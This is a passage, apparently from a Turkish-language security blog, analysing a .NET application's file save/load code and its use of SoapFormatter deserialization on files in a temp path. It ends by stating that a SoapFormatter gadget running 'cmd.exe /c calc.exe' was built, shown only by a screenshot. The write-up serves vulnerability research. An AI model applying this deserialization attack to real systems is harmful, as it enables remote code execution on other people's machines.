fonksiyonu mscorlib dllinde System.IO namespace&rsquo;nin bir fonksiyonudur bu fonksiyonda verdigimiz verinin dosya uzantisini cikartiyor ornek olarak <code>abc.txt =&gt; .txt</code> gibi. Tekrar pathFromName&rsquo;e geri donelim verdigimiz verinin uzantisini kontrol ediyor verilen degerin uzantisi bossa direk .DASH olmaktadir.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span><span style="color:#66d9ef">string</span> text = <span style="color:#66d9ef">this</span>.pathFromName(name); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">public</span> <span style="color:#66d9ef">string</span> pathFromName(<span style="color:#66d9ef">string</span> name) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">string</span> extension = Path.GetExtension(name); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (extension == <span style="color:#66d9ef">null</span> || extension == <span style="color:#66d9ef">string</span>.Empty) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> name += <span style="color:#e6db74">&#34;.DASH&#34;</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> Path.Combine(DashFiles.getDashTempPath(), name); </span></span><span style="display:flex;"><span> } </span></span></code></pre></div><ol> <li>name parametresini pathFromName fonksiyonuna atiyor.</li> <li>name parametresi ile verileni <code>File.OpenWrite</code> yardimi ile aciyor.</li> <li>Serialize ediyor.</li> </ol> <p><code>SoapFormatter, .NET Framework icerisinde yer alan bir serilestirme aracidir. Bu arac, nesneleri SOAP (Simple Object Access Protocol) formatinda serilestirip yani bir dizi byte donusturup depolamak veya ag uzerinden iletmek icin kullanilir. SoapFormatter, genellikle uzaktan prosedur cagri RPC ve web servisleri ile etkilesimde bulunmak icin kullanilir.</code></p> <h3 id="load-methodu"><code>Load</code> Methodu</h3> <p><img src="https://exploit7.tr/resource/load.png" alt="LOAD"></p> <ol> <li><code>WidgetContainer</code> nesnesini null olarak tanimliyor.</li> <li><code>CGetGenFileData</code> sinifindan bir nesne olusturuluyor <code>m_conf.getGenFileDataSource</code> methodu, gerekli ozelliklere gore veri kaynagi sagliyor.</li> <li><code>genFileDataSource.getGenFile</code> name parametresinden aldigi .DASH uzantisi eklenerek olusturulan dosya adini temp file yolunu kullanarak dosyayi alir.</li> <li>Catch icerigini es geciyorum.</li> <li><code>name</code> parametresini aliyor save methodundaki gibi kontrol vs.</li> <li>Eger dosya varsa dosyayi okuyor.</li> <li>Deserialize ediyor.</li> </ol> <p>Bizim icin en onemli madde 7. maddedir, ozet olarak bir dosyayi aliyor kayit ediyor, duzenliyor, aciyor bunlari yaparken serialize ve deserialize islemi gerceklestiriyor.</p> <h3 id="exploit7-bolumu">Exploit7 Bolumu</h3> <p>SoapFormatter ile <code>cmd.exe /c calc.exe</code> calistiracagimiz gadgeti olusturuyoruz ve sonuc&hellip;</p> <p><img src="https://exploit7.tr/resource/calc.png" alt="CALC"></p>